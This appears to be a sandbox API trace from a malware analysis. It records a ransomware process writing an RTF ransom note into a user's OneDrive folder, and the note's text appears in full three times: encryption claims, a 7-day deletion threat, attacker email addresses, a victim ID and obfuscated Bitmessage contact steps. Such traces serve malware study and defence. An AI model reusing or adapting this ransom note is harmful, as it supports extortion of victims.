(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\sv\\#readme_eman#.rtf")) returned 0xffffffff [0295.899] GetLastError () returned 0x2 [0295.899] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\sv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.899] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.899] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.899] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd 